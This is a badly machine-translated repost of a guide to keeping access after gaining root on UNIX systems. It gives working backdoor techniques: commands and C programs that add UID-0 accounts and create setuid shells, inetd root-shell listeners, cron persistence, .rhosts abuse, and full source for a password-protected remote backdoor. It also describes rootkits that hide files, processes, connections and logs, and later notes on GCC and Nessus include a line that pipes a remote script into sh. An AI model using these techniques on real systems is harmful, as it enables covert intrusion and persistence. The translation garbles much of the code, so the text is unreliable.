After the UNIX system overcome

xiaoxiao2021-03-06  64

After the UNIX system overcome

Princide: What should I do after I get the system root? Your own opinion: First stay in a few backsheets, the purpose is naturally understood, to go in to open a convenient door for yourself, and hide yourself! After that, do you have a GCC, use it to compile the program, no? Give him one. His speed is good, used to scan very well, put it a NESSUS. The idea is good, how to implement it, look down below:

The first part of the back door and hidden

1.0 latter door:

1.0.1 Give / etc / passwd and / etc / passwd add a user:

Echo "Hacker :: 0: 0 :: /: / bin / sh" >> / etc / passwdecho "Hacker ::::::::::::::::::::::::::::::::::::: > backdoor / backdoor1.c #include main () {file * fd; fd = fopen ("/ etc / passwd", "a "); fprintf (fd, "HAX0R :: 0: 0 :: / ROOT: / BIN / SH / N ");} <->

However, it is easy to find root to improve:

Change some of these less common users, such as Games, first put cp / etc / passwd / etc / passwdold, use VI to modify the UID and GID of the / etc / passwdold Games, the Games line is as follows :

Games :: 0: 0 :: /: / bin / sh

The second improvement, plus the user to / etc / passwd position: (this is to see others, I haven't tried it!)

#! / bin / csh # INSERTS A UID 0 Account Into The Middle of the Passwd File. # there in 1/2 a line of awful. # # daemon9@Netcom.com

Set linecount = `wc -l / etc / passwd`cd # do this at home.cp / etc / passwd ./temppass # safty first.echo passwd file haas $ linecount [1] lines. @ linecount [1] / = 2 @ linecount [1] = 1 # We Only Want 2 Temp Fileesecho Creating Two Files, $ LineCount [1] Lines Each / (or ApproxImately That /). Split - $ LINECUNT [1] ./temppass # passwd string OptionAlerecho "Eviluser :: 0: 0: Mr. Sinister: / home / sweet / home: / bin / csh ">> ./xaacat ./xab >> ./xaamv ./xaa / etc / passwdchmod 644 / etc / passwd # or wherever IT was beforehandrm ./xa* ./temppassecho done ...

It is also easy to find, add ordinary users, the following method to get root privileges

1.0.2setuid shell method: cp / bin / sh/tmp/.shchmod u s /tmp/.sh After running /TMP/.sh, you can get root. However, / TMP data is easy to eliminate, you can put it in other directories

Use the program to see:

< > backdoor / backdoor2.c #include main () {system ("cp / bin / sh / tmp / fid"); system ("chown root.root / tmp / fid"); system ("CHMOD 4755 / TMP / FID");} <->

1.0.3 process back door

Open the /etc/inetd.conf file, the form is as follows, unrecognized, you can see the instructions yourself. Service Name Socket Type Protocol Type WAIT / NOWAIT Username Server Path Service Name and Parameters (1) (2) (3) (4) (5) (6) FTP STREAM TCP NOWAIT ROOT / USR / ETC / FTPD FTPDTALK DGRAM UDP WAIT ROOT / USR / ETC / NTALKD NTALKD

See this line: Daytime Stream TCP NOWAIT ROOT Internal

Change this line to yourself:

Daytime Stream TCP NOWAIT ROOT / BIN / SH SH -I

Restart inetdkill -9 / usr / sbin / inetd or / usr / etc / inetd

Those known services can be found in / etc / services. The format is as follows

(1) (2) / (3) (4) SMTP 25 / TCP MAIL

You can add your own service:

Evil 22 / TCP EVIL

Then add in /etc/inetd.conf:

Evil Stream TCP NOWAIT ROOT / BIN / SH SH -I

Restart inetdkill -9 / usr / sbin / inetd or / usr / etc / inetd

If you start a shell, you can log in remotely and see the following excerpt:

Better, more concealed approach is to fake network services, allowing it to provide us with backmen, such as password protection, etc. If you can easily access your remote access without passing the Telnetd, it is better. The method is to bind the "own" daemon to a port, which does not provide any prompts to the outside connection, but as long as the correct password is directly entered, it will be able to enter the system smoothly. The following is a demonstration program of this back door. (Note: This program is not very complete.)

< > Backdoor / Remoteback.c / * Coders: theft

Help from: Sector9, Halogen

Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle, halogen, Psionic, g0d, Psionic Groups:. Ethical Mutiny Crew (EMC), Common Purpose hackers (CPH), Global Hell (gH), Team Sploit, Hong Kong Danger Duo, TG0D, EHAP. Usage: setup: # gcc -o backhore backhore.c # ./backdoor password & run: telnet to the host on port 4000.After Connected You Will Not Be Prompted for a Password, this Way IT IS LESS Obvious, Just Type The Password and Press Enter, After this You Will Be Prompted for A Command, Pick 1-8.Distributers: Ethical Mutiny Crew

* /

#include #include #include #include #include #include #include #include

#define port 4000 #define maxDataSize 100 #define backlog 10 #define sa struct sockaddr

Void Handle (int);

INT Main (int Argc, char * argv []) {int SOCKFD, New_FD, SIN_SIZE, NUMBYTES, CMD; CHAR ASK [10] = "Command:"; char * bytes, * buf, pass [40]; struct sockaddr_in my_addr ;

Struct SockAddr_in their_addr;

Printf ("/ n backhore beta by theft / n"); Printf ("1: Trojans rc.local / n"); Printf ("2: Sends a systemwide message / n"); Printf ("3: binds a root Shell on Port 2000 / N "); Printf (" 4: Creates Suid SH IN / TMP / N "); Printf (" 5: Creates Mutiny Account Uid 0 No Passwd / N "); Printf (" 6: Drops to SUID) Shell / N "); Printf (" 7: Information on backhore / n "); Printf (" 8: Contact / N ");

IF (argc! = 2) {fprintf (stderr, "usage:% s password / n", argv [0]); exit (1);}

STRNCPY (Pass, Argv [1], 40); Printf (".. using password:% s ../ n", pass);

IF ((SOCKFD = Socket (AF_INET, SOCK_STREAM, 0) == -1) {Perror ("socket"); exit (1);} my_addr.sin_family = AF_INET; my_addr.sin_port = htons (port); my_addr. SIN_ADDR.S_ADDR = INADDR_ANY;

IF (Bind (SOCKFD, (SA *) & my_addr, sizeof (sa)) == -1) {

PERROR ("bind"); exit (1);

IF (Listen (Sockfd, Backlog) == -1) {Perror ("Listen"); exit (1);}

SIN_SIZE = SIZEOF (SA); While (1) {/ * main accept () loop * / if ((new_fd = accept (sockfd, (sa *) & their_addr, & sin_size)) == -1) {PERROR ("accept" ); contract (! fork ()) {DUP2 (new_fd, 0); DUP2 (new_fd, 1); DUP2 (new_fd, 2); FGETS (BUF, 40, stdin); if (! strcmp (buf, PASS)) {Printf ("% s", ask); cmd = getchar (); handle (cmd);} close (new_fd); exit (0);} close (new_fd); while (waitpid (-1, null , Wnohang)> 0); / * rape the dying children * /}}

Void Handle (INT CMD) {file * fd;

Switch (cmd) {CASE '1': Printf ("/ nbackhore beta by theft / n"); Printf ("Trojaning Rc.local / N"); fd = FOPEN ("/ etc / passwd", "a "); FPRINTF (FD, "MUTINY:: 0: 0: Ethical Mutiny Crew: / root: / bin / sh"); Fclose (FD); Printf ("Trojan Complete ./N "); Break; Case '2': Printf (" / nbackhore beta by theft / n "); Printf (" theft@cyberspace.org/N); Printf ("Sending SystemWide Message ../ n" ); System ("Wall Box Owned Via the Ethical Mutiny Crew"); Printf ("Message Sent./N"); Break; Case '3': Printf ("/ NbackHore Beta by theft / n"); Printf (" Theft@cyBerspace.org/N "); Printf (" / Nadding inetd backdoor ... (-P) / n "); fd = fopen (" / etc / services "," a "); fprintf (fd," Backdoor / T2000 / TCP / TBACKDOOR / N "); fd = fopen (" / etc / inetd.conf "," a "); fprintf (fd," Backdoor / TSTREAM / TTCP / TNOWAIT / TROOT / T / BIN / SH -i / n "); Execl (" KILLALL "," -HUP "," inetd ", null); Printf (" / ndone./N "); Printf (" Telnet to Port 2000 / N / N "); Break; Case '4': Printf ("/ nbackhore beta by theft / n"); Printf ("" theft@cyberspace.org/n "); Printf (" / NADDING SUID Shell ... (-s) / n "); System (" CP / BIN / SH /TMP/.sh "); System (" Chmod 4700 /TMP/.sh "); System (" Chown Root: root / TMP / .sh "); Printf (" / nsuid shell added./N); Printf ("execute /tmp/.sh/n/n"); Break; Case '5': Printf ("/ NBACKHORE BETA BY THEFT / N "); Printf (" theft@cyBerspace.org/N "); Printf (" / Nadding root accent ... (-u) / n "); fd = fopen (" / etc / passwd "," A ");

FPRINTF (FD, "HAX0R:: 0: 0 :: /: / bin / bash / n"); Printf ("/ ndone./N"); Printf ("UID 0 and GID 0 Account ADDED / N / N" Break; Case '6': Printf ("/ nbackhore beta by theft / n"); Printf ("theft@cyberspace.org/N); Printf (" Executing Suid ../ n "); Execl "/ bin / sh"); Break; Case '7': Printf ("/ nbackhore beta by theft / n"); Printf ("theft@cyberspace.org/n"); Printf ("/ ninfo ... -i) / n "); Printf (" / n3 - adds entries to / etc / services & /etc/inetd.conf giving you / n "); Printf (" A root shell on port 2000. EXAMPLE: Telnet 2000 / n / n "); Printf (" 4 - creates a copy of / bin / sh to /tmp/.sh which, whenever / n "); Printf (" executed gives you a root shell. EXAMPLE: / TMP /.SH/N/N "); Printf (" 5 - adds an accountwith uid and gid 0 to the passwd file./N "); Printf (" The login is 'mutiny' and there is no passwd. ") Break; Case '8': Printf ("/ nbackhore beta by theft / n"); Printf ("http://theft.bored.org/N"); Printf ("theft@cyberspace.org/n/n "); Break; default: Printf (" Unknown Command:% D / N ", CMD); Break;}} <->

1.0.4 crontab back door (/ * excerpt * /)

The root user's crontab file is placed in / var / spool / crontab / root, and its format is as follows:

(1) (2) (3) (4) (5) (6) 0 0 * * 3 / usr / bin / updatedb

1. Minute (0-60) 2. Hours (0-23) 3. Day (1-31) 4. Month (1-12) 5. Week (1-7) 6. The procedure to run

The above content is set to run at 0:0 per Word. To create a back door in Cron, just add a latter program in / var / spool / crontab / root. For example, the program can be checked daily in the / etc / passwd file to increase the user accounts still valid. The following is a program example:

0 0 * * * / usr / bin / retract

< > Backdoor / Backdoor.sh #! / bin / csh

Set evilflag = (`GREP Eviluser / etc / passwd`)

IF ($ # Evilflag == 0) THEN

Set linecount = `wc -l / etc / passwd ./temppass @ linecount [1] / = 2 @ linecount [1] = 1 split - $ linecount [1] ./tempppass echo" meb :: 0: 0: Meb: / root: / bin / sh ">> ./xaa carat ./xab >> ./xaa mv ./xaa / etc / passwd chmod 644 / etc / passwd rm ./xa*. / Temppass echo done ... Else Endif <-> This latter utilization has a lot of methods, such as you can put a setuid shell, put a shellcode, etc. to establish a SETUIDSHELL method:

< > backdoor / backdoor3.c #include #define pass "Triad" #define buffersize 6

Int main (argc, argv) int Argc; char * argv []; {

INT i = 0;

IF (argv [1]) {

IF (! ")) {

System ("cp / bin / csh /bin/.swp121"); System ("chmod 4755 /bin/.swp121"); System ("Chown root /bin/.swp121)); System (" CHMOD 4755 / BIN / .swp121 ");}}

Printf ("372f: invalid control argument, unable to initialize); for (; i <10; i ) {fprintf (stderr,"); Sleep (1);} printf ("/ nAction aborted After 10 Attempts./N "); return (0);} <->

1.0.5.rlogin back door

In UNIX machines, services such as RSH and RLogin are simple authentication methods that use the hostname in the RHOSTS file. Users can easily change the settings without passwords. Intruders as long as they can access Enter " " in the RHOSTS file, you can allow anyone to enter this account from anywhere without your mouth. In particular, when the Home directory is shared outwards through NFS, the intruder is hot. These accounts have become invaded. The back door of again. Many people prefer to use RSH because it usually lacks logging. Many administrators often check " ", so intruders actually set more host names and user names from another account on the Internet. It is difficult to be discovered.

# echo " "> /usr/bin/.rhosts

# cat /usr/bin/.rhosts

# rlogin -l root localhost

Will you do not need to enter your password directly with the root account rlogin to enter your machine

1.0.6.Rootkit This is the most exciting part. Now there are several rootkit:

1.0.6.1 first is LinuxRootkit5.0 can download here: http://www.securityfocus.com/tools/1489

a. Contains files:

CHFN, CHSH, CRONTAB, DU, FIND, IFCONFIG, INETD, KILLALL, LINSNIFFER, LOGIN, LS, NETSTAT, PASSWD, PIDOF, PS, RSHD, Syslogd, TCPD, TOP, SSHD, AND Su. Also Comes with Bindshell, FIX, LINSNIFFER, THESNIFF, SNIFFCHK, WTED, AND Z2.B. File function:

1 - Modified Programs That Hide The Intruder:

. Ls, find, du - these programs will not count or display the intruder files the data file is ROOTKIT_FILES_FILE, defaults to / dev / ptyr NOTE: all files can be listed with the 'ls- /' if SHOWFLAG is enables Will hide. Any Files / Directories with the names, ptyr, hack.dir, and w4r3z.

PS, TOP, PIDOF - THESE Programs Will NOT Display The Intruders Processes

NetStat - Will NOT Display Traffic from Or To Specified IP Addresses, User-IDs, or Ports

Killall - Will NOT KILL The Intruders Hidden Processes

IFCONFIG - WILL NOT DISPLAY The Promisc Flag When Snifer Is Running

Crontab - Will Hide the crackers Entries- The Hidden crontab entry is in the / dev / hda02 by Default

TCPD - WILL NOT LOG Connections Listed in The Configuration File

Syslogd - Will NOT LOG Connections listed in The Configuration File

2 - Trojaned Programs with Backdoors:

CHFN - New Full Name Enter Password Will Drop Rootshell

Chsh - New Shell Enter Password Will Drop Rootshell

Passwd - rootshell if is entered as current password

Login - Will Allow The Cracker To Log in Under Username with The Rootkit Password (Satori) -also if root is Refused UserName (REWT) WILL WORK AND WILL DISABLE THE HISTORY LOGGING

3 - Trojaned Network Daemons:

inetd - rootshell listening on port 5002. The rootkit password Most Be Entered in As The First Line (SATORI)

RSHD - The Username Is The Rootkit Password, a root shell is bound to the port [Hostname)] 4 - Utilities:

FIX - Replace and Fixes TimeStamp / Checksum Information on Files

LINSNIFFER - A Packet Sniffer

Sniffchk - Checks to make Sure The Sniffer Alive

WTED - WTMP / UTMP Editor

Z2 - ERASES ENTRIES IN THE WTMP / UTMP / LastLog Entries for a Username-Will Only Null The Entry

Bindshell - Binds a rootshell to a port (31337) by Default

C. Specific use:

C.1 where the LS DU Find is used to conceal files, first create the establishment / dev / ptyr, then add the file you want to hide, such as the Hacktool file to be hidden using Echo Hacktool >> / dev / ptyr

C.2 PS Top Pidof hidden process, the hidden process must establish a / dev / ptyp file, Linuxrootkit provides a four-hidden process method 0 0 Hidden all UIDs 0 Processes 1 P0 Concealed all TY0 terminals 2 Sniffer Concealed all process 3 Hack hidden in all names in all names that contain "Hack" strings

To conceal all processes with "HACK" with Echo 3 Hack >> / dev / ptyp

C.3 NetStat is used to conceal connections, setting / dev / ptyq has 6 methods of hidden connections

0 500 Connecting all UIDs 500 connection 1 128.31 Connect all network connections from 128.31.xx 2 128.31.9.2 Connect all connections from 128.31.9.2 3 8000 hidden all from 8000 ports 4 6667 hidden all connect 6667 ports Connection 5 Term / Socket concealed all UNIX sockets with Term / Socket path

C.4 Syslog is used in coin system logging, setting / dev / ptys

Linuxrootkit default configuration can be made in rootkit.h, the key is the password, not setting the default is Satori.

1.0.6.2 is the rootkitsunos function description:

---------------- Rootkit Release 1. ------------------

After Spending Tons of Time Having to Do All of this by myself, i finally decided to do orthol me.call me a script cracker, but I'm lazy as hell. You don't wantto use it, You don't have to. Keep in Mind It Takes Me A Maxof 40 SECONDS ON A 4/65 To Compile and Install Every Program :-)

Here Is How IT Works:

Execute The Command: `make all install '

The Following Programs Will Be Installed Suid Root in destdir:

z2: removes entries from utmp, wtmp, and lastlog.es: rokstar's ethernet sniffer for sun4 based kernels.fix: try to fake checksums, install with same dates / perms / u / g.note: if you do not want these files installed SUID (The AdministratorHas A Cron to Check for Suid Files, or the Like), The Typemake Cleansuid and The Suid Bits Will Be Removed.

The following programs will be patched and an attempt at spoofingthe checksums of the files will be made. Also, these files willbe installed with the same dates, permissions, owners, and groupsof the originals.

Sl: Become Root Via a Magic Password Sent To Login.ic: Modified ifconfig to remove promisc flag from output.ps:ns:ls: d5:ls5:

Here Are Some Notes on The Patch for `PS`:

1.This Doesn't Modify The Process Lists, SO YourProcesses Are Still in Memory, But Ps Just Won't PS Sitting Onbest To search for Sgid Kmem Programs To Be Fairly Sure.

2.An EXAMPLE / DEV / PTYP FILE IS FOLLOWS:

0 0 Strips All Processes Running Under Root1 P0 Strips Tty P02 Sniffer Strips All Programs with the name snifer

3.Do not leave a NULL string anywhere in the file. Duringtesting, I often pressed return after my last controlstatement. Do not do this as it will cause a meory fault.Do not use a character as the first line in the control file. Remember to Convert the Uid's You Wished Masked to ThierNumeric Format.

4.Programs Such as "TOP" Will Still Show Processes Running.This Is Bad. I'm Working On A Patch.

Here Are Some Notes on The Patch for `NetStat`:

1.This does not modify network listings, so your networkconnections are STILL in memory, but `netstat` justwon't display them. If another copy of` netstat` isrun on the machine, it will produce accurate results.Best to search for SGID KMEM Programs to Be Fairly Sure.2.an Example / Dev / Ptyq File IS FOLLOWS:

0 6667 # Strip All Foreign Irc Network Connections1 23 # Strip All Local Telnet Connections2.209.5 # Strip All Foreign Connections from Cert.org3.175.9.8 # Strip All local connections to netsys4.netsys.com

3.Do not leave a NULL string anywhere in the file. Itwill cause a memory fault. When stripping addresses, a string search is used to compare addresses in thecontrol file with actaul network connections. Thiscould cause minor problems.

4.it Would PROBLY BETTER to Only Strip The Address Oncefor Each Line In The Control File. Addied CommandSIS Trivial. Check `Inet.c`.

Here Are Some Notes On The Patch For `Ls` &&` du` && `du5` &&` ls5`

1.ls and du it Trojaned and your files willnot be listed unless unless you isssue a / flag.

2. EXAMPLE / DEV / PTYR

Sunsnif # Strip the filename sunsnificmpfake # Strip the filename icmpfake

3. Would Be Useful if stripping uids, and gids wasteincluded.

----

Later Eleetz, Have Fun and Don't Fuq Shit Up, All It Duziz Get People Put in jail.

Werd.

Part 2 Installing GCC

The GCC is a free C compiler of the GNU organization. Many Linux have released the default installation. A lot of popular free software original code can basically compile operation under the GCC compiler. Although GCC has a lot of platform (operating system), the general business UNIX system does not install GCC. To use GCC on these operating systems, you must do it yourself. The following mainly introduces GCC, installation, and debugging steps in the Sun Solaris operating system.

1 Number of GCC software for operating system and operating system versions If you want to use GCC on Solaris 2.5.1, you have to get the release of GCC ftp: //ftp.cdit.edu.cn/pub/unix/solaris/sparc25 /gcc-2.7.2.1.gz2 decompression. Gz said it is a file that is compressed by Gzip. You need to first decompress with Gzip / Gunzip software. $ GUNZIP GCC-2.7.2.1.gz

3 After installing the decompression is the installation package. The installation package in the Solaris operating system has a set of special commands and programs #pkgadd -d ./gcc-2.7.2.1 In the next installation, there will be an interactive installation process.

4 Debug Take GCC-2.7.2.1 as an example, GCC default installation path is / OPT / GCC2721, this path may not be within the scope of the user's Path variable, so you need to update the PATH variable, which is convenient to use GCC.

Users who use CSH:% setenv path = $ PATH: / OPT / GCC2721 / BIN for users who use SH: $ path = $ PATH: / OPT / GCC2721 / BIN $ EXPORT PATH

If you don't want to update the PATH environment variable each time you use the GCC, you can write the above content in the user's initial file: for the CSH user: written in the .cshrc file under the user's home directory: write under the user's home directory .profile file

5 Frequently Asked Questions Q: When the GCC-Version.gz file is decompressed, "Gunzip did not find" A: It may be that you don't have Gzip / Gunzip software in advance, first download Gzip for the corresponding OS, and then install. It may be that Gzip / Gunzip is not in the Path search path, view / usr / local / bin, if available, add absolute path when using Gunzip.

Q: The GCC has been successfully installed, and "can't Find GCC" is wrong when compiling software. A: The biggest possibility is that the GCC's execution directory is not in the current search path PATH. It is done according to the method described in step 4 of this article.

Q: How to install use C compiler [Added: 1999/10/24] A: GCC provides G as a replacement of C , usually use G library to support, download the libstdc package for your OS version, then install . After installation, set the ld_library_path environment variable, allow the libstdc library to be used by other programs to use $ ld_library_path = / usr / local / lib $ export ld_library_path6 related resources ftp: //ftp.cdit.edu.cn/pub/unix/Solaris/ Provide The gcc, gzip http://www.gnu.org gnu, in this article http://metalab.unc.edu/ Northern Carolina's website provides GNU released by GNU, etc. below Solaris2.x, 7 The software installation package also has many original code and software under Linux.

Part III NESSUS and Scanning

3.1. Download and Install

The Easy and Dangerous Way (Ala Ximian Gnome :))

IF you are installing nessus from a computer directly connected to the Internet That Has Lynx Installed, Type this Command (not as root!):

lynx -source http://install.nessus.org | shThis method is considered as dangerous in the sense that if you do it, you are running commands that directly come from the internet If someone is poisoning your domain name server, he may. .................... ..

The USUAL and BORING WAY:

You Can Also Install The Nessus Tar Archives Individally.to Install Nessus, You Have To Download and Compile Sse Packages in The Following Order:

Nessus-libraries libnasl nessus-core nessus-plugins see the compilation instructions if you have.com

It is generally easy to implement in the first method. However, security is almost, because if you install it, use normal users to enter the root password, even if your password with root may be listened.

3.2. Create a NESSUSD account

# Nessus-adduser

Addition of a new net needusd user ------------------------------

Login: RenaudAuthentication (Pass / CERT) [Pass]: Passpassword: Secret

User rules ---------- Nessusd Has A Rules System Which Allows You to Restrict The Hoststhat Renaud2 Has The Right To Test. For Instance, You May Wanthim to Be Able To Scan His Own Host Only.

Please see the net inus-adduser (8) Man Page for the rules Syntax

Enter the rules for this user, and hit ctrl-d overce you are done: (The User Can Have An Empty Rules Set)

Deny 10.163.156.1allow 10.163.156.0/24DEFAULT DENY

Login: Renaudpassword: Secretdn: Rules:

Deny 10.163.156.1allow 10.163.156.0/24DEFAULT DENY

Is there ok (y / n)? [Y] y

User added.

3.3. Start service

#nessusd -d

3.4. Connect to Nessusd

#nessus opens a window, can be prompted

Do not understand, come here http://www.nessus.org/demo/first.html, there is a detailed description.

转载请注明原文地址:https://www.9cbs.com/read-119306.html

New Post(0)